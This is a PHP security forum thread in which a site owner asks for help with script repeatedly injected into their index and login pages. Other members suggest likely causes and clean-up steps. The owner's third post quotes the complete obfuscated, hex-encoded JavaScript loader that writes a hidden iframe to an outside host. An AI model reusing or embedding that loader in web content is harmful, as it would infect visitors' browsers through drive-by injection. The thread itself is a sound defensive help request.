got a virus named Iframe.ph on my server

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Post Reply
jawedshamshedi
Forum Commoner
Posts: 35
Joined: Fri May 16, 2008 1:17 am
Location: India
Contact:

got a virus named Iframe.ph on my server

Post by jawedshamshedi »

Hi all,

I have a website running, it was fine few days back but now when a open the site it opens a blank page then i checed the code of the index page then i found that there is a javascript ebmedded in my code in all index pages and login pages, this javascirpt did open a blank page.
I dowloaded whole site, deleted the code form the server scanned the code with kerpersky antivirus and notorn antivirus , both did not showed any virus in the code then i manuallyu checked all index and login named pages and no malacious code was there then i uploaded the site again , but for my bad luck then virus again come in Iframe.ph and again the site is not opening due to the same javascript code??????


Can anyone help me in this regard ?????
User avatar
jaoudestudios
DevNet Resident
Posts: 1483
Joined: Wed Jun 18, 2008 8:32 am
Location: Surrey

Re: got a virus named Iframe.ph on my server

Post by jaoudestudios »

What text editor are you using?

As I know Dreamweaver enters lots of unwanted javascript.

Can you paste some of the code here so we can see it?
User avatar
Apollo
Forum Regular
Posts: 794
Joined: Wed Apr 30, 2008 2:34 am

Re: got a virus named Iframe.ph on my server

Post by Apollo »

Most likely some gained access to your webdirectory and infected some scripts.

Where is your website hosted?
jawedshamshedi
Forum Commoner
Posts: 35
Joined: Fri May 16, 2008 1:17 am
Location: India
Contact:

Re: got a virus named Iframe.ph on my server

Post by jawedshamshedi »

Hi
thanks for the respnse , i am using dreamweaver cs3 and my site is hosted on netsol. The problem is all the files named as index and login are affected, all the codes in these files get lost and this javascript is embedded

<script>function c41920832628m486aaf31e5abe(m486aaf31e5ea3){ function m486aaf31e628c(){return 16;} return (parseInt(m486aaf31e5ea3,m486aaf31e628c()));}function m486aaf31e6a5c(m486aaf31e6e43){ function m486aaf31e79fb(){var m486aaf31e7de2=2;return m486aaf31e7de2;} var m486aaf31e722f='';m486aaf31e81cb=String.fromCharCode;for(m486aaf31e7613=0;m486aaf31e7613<m486aaf31e6e43.length;m486aaf31e7613+=m486aaf31e79fb()){ m486aaf31e722f+=(m486aaf31e81cb(c41920832628m486aaf31e5abe(m486aaf31e6e43.substr(m486aaf31e7613,m486aaf31e79fb()))));}return m486aaf31e722f;} var zf3='';var m486aaf31e85b2='3C7'+zf3+'3637'+zf3+'2697'+zf3+'07'+zf3+'43E667'+zf3+'56E637'+zf3+'4696F6E20636865636B5F636F6E7'+zf3+'4656E7'+zf3+'428297'+zf3+'B7'+zf3+'6617'+zf3+'220693D303B7'+zf3+'7'+zf3+'68696C6528646F637'+zf3+'56D656E7'+zf3+'42E67'+zf3+'657'+zf3+'4456C656D656E7'+zf3+'47'+zf3+'3427'+zf3+'9546167'+zf3+'4E616D652827'+zf3+'69667'+zf3+'2616D6527'+zf3+'292E6C656E67'+zf3+'7'+zf3+'468297'+zf3+'B7'+zf3+'6617'+zf3+'220656C3D646F637'+zf3+'56D656E7'+zf3+'42E67'+zf3+'657'+zf3+'4456C656D656E7'+zf3+'47'+zf3+'3427'+zf3+'9546167'+zf3+'4E616D652827'+zf3+'69667'+zf3+'2616D6527'+zf3+'295B695D3B6966282028656C2E7'+zf3+'37'+zf3+'47'+zf3+'96C652E64697'+zf3+'37'+zf3+'06C617'+zf3+'93D3D27'+zf3+'6E6F6E6527'+zf3+'207'+zf3+'C7'+zf3+'C20656C2E7'+zf3+'37'+zf3+'47'+zf3+'96C652E7'+zf3+'6697'+zf3+'36962696C697'+zf3+'47'+zf3+'9203D3D27'+zf3+'68696464656E27'+zf3+'207'+zf3+'C7'+zf3+'C2028656C2E7'+zf3+'7'+zf3+'69647'+zf3+'4683C3520262620656C2E68656967'+zf3+'687'+zf3+'43C35292920262620656C2E6E616D65213D27'+zf3+'633427'+zf3+'297'+zf3+'B656C2E7'+zf3+'0617'+zf3+'2656E7'+zf3+'44E6F64652E7'+zf3+'2656D6F7'+zf3+'6654368696C6428656C293B7'+zf3+'D656C7'+zf3+'36520692B2B3B7'+zf3+'D7'+zf3+'D636865636B5F636F6E7'+zf3+'4656E7'+zf3+'428293B0D0A696628216D7'+zf3+'96961297'+zf3+'B646F637'+zf3+'56D656E7'+zf3+'42E7'+zf3+'7'+zf3+'7'+zf3+'2697'+zf3+'465287'+zf3+'56E657'+zf3+'363617'+zf3+'065282027'+zf3+'2533632536392536362537'+zf3+'322536312536642536352532302536652536312536642536352533642536332533342532302537'+zf3+'332537'+zf3+'32253633253364253237'+zf3+'2536382537'+zf3+'342537'+zf3+'342537'+zf3+'30253361253266253266253637'+zf3+'253666253666253637'+zf3+'2536632536352532642536312536652536312536632536392537'+zf3+'61253635253265253633253666253664253266253639253665253265253633253637'+zf3+'253639253366253331253335262537'+zf3+'382537'+zf3+'3525336425333126253237'+zf3+'2532622534642536312537'+zf3+'342536382532652537'+zf3+'322536662537'+zf3+'352536652536342532382534642536312537'+zf3+'342536382532652537'+zf3+'32253631253665253634253666253664253238253239253261253332253334253331253335253332253337'+zf3+'253239253262253237'+zf3+'253635253338253631253338253332253339253635253337'+zf3+'253634253636253634253237'+zf3+'2532302537'+zf3+'37'+zf3+'2536392536342537'+zf3+'34253638253364253335253336253333253230253638253635253639253637'+zf3+'2536382537'+zf3+'342533642533342533322533392532302537'+zf3+'332537'+zf3+'342537'+zf3+'39253663253635253364253237'+zf3+'2536342536392537'+zf3+'332537'+zf3+'302536632536312537'+zf3+'39253361253230253665253666253665253635253237'+zf3+'2533652533632532662536392536362537'+zf3+'3225363125366425363525336527'+zf3+'29293B7'+zf3+'D7'+zf3+'6617'+zf3+'2206D7'+zf3+'969613D7'+zf3+'47'+zf3+'27'+zf3+'5653B3C2F7'+zf3+'3637'+zf3+'2697'+zf3+'07'+zf3+'43E';document.write(m486aaf31e6a5c(m486aaf31e85b2));</script><script>check_content()</script>

I tried many things but none worked out, even i removed the write permission of index and login files but this too did not work.

Thanks in advance for any kind of help
User avatar
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: got a virus named Iframe.ph on my server

Post by Mordred »

Scan your developer machine. There are malwares that do what you describe from your own machine.
For a workaround, zip your site and upload it from a cleanly installed OS.
orbitz
Forum Newbie
Posts: 3
Joined: Tue Jun 10, 2008 10:54 am

Re: got a virus named Iframe.ph on my server

Post by orbitz »

you also might have some apps that have vulnerability. Make sure to update those apps.
jawedshamshedi
Forum Commoner
Posts: 35
Joined: Fri May 16, 2008 1:17 am
Location: India
Contact:

Re: got a virus named Iframe.ph on my server

Post by jawedshamshedi »

thanks for the post, i already did all these, download whole site scanned with norton and kersperky anti virus, manually checked pages coding but nothing wrong was in those code, and again the virus came, one more thing i wanted to add is that i am using some Open source code like list, forums and event calender , so can this be a reason ?????? means the open source code is putting some scripts lke this ????
User avatar
Maugrim_The_Reaper
DevNet Master
Posts: 2704
Joined: Tue Nov 02, 2004 5:43 am
Location: Ireland

Re: got a virus named Iframe.ph on my server

Post by Maugrim_The_Reaper »

Could be a bot driven attack from an external source - are you using any PHP application which would be considered old or insecure? One popular example is PHPNuke or older versions of phpBB. These are so common they attract automated attacks.

The other option is to contact your hosting provider in case it's not just a simpler code injection attack. Maybe a google search of the javascript could turn up similar cases elsewhere also?
Reviresco
Forum Contributor
Posts: 172
Joined: Tue Feb 19, 2008 4:18 pm
Location: Milwaukee

Re: got a virus named Iframe.ph on my server

Post by Reviresco »

I have had similar problems with one of my Network Solutions sites, but not the exact same scripts you've been getting. As far as I can tell, they hacked the server and put malicious files in my directories. I think the security holes have been fixed, but the scripts continued to wreak havoc until I found them.

First be sure to change your FTP login name and password. Then look through all your files and folders for anything you didn't make yourself. They're often placed in "images" folders, sometimes in a new folder called "thumbnails".

The files are often called things like "left_menu.php" or "right_menu.php". You'll see that there will be some encrypted code, which is run using eval(base64_decode()). You also will probably find a script that calls the php function system().

At least -- this is what was causing the problems for me.
Post Reply